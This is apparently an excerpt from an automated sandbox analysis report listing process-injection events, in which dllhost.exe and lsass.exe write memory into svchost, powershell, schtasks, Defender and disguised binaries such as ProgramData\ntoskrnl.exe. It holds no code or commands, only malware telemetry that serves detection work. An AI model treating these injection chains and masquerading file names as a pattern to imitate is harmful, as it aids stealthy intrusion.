                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1010000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E580000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB570000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 7F80000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10B60000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2256CFB0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2C00000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E4E5CC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 282093A0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C891080000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF983B0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1924DB90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: F00000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2C00000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 8C0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2FB0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: CB0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: DC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2D40000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 880000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: F60000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 26A0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D00000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DA0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2EA0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2E90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2EF0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D60000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2B20000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DB0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E10000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D70000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2B70000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E50000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1590000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 8E0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D40000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: EC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: CF0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 620000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2990000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 29F0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D70000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2F20000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2D40000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 670000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1470000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 15C0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11C0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D40000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D10000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2970000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 26A0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 10E0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: A90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2380000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2BC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 930000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11D0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 23A0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1150000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D30000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1130000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B20000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A60000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A20000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D60000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: FB0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 600000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: C80000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1460000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: DC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11A0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E70000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 7B0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2C60000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1290000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 9F0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2230000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A90000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1170000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2880000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B00000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 1B7C0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2153E9B0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2C14A960000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BC83280000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28FAE000000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28FAE2E0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 25C9D520000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 180CBB00000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 180CBB30000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BC5FFD0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1E9DCC60000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1E9DCD80000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 25FC3320000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19C14ED0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6450000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973D0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 213A4CC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 20DF5510000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FA39650000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FB8E0E0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 5D0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 900000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 1B0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 400000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 25A16DF0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 25A16E20000Jump to behavior
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 22382760000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973D0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973F0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1B998180000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6460000
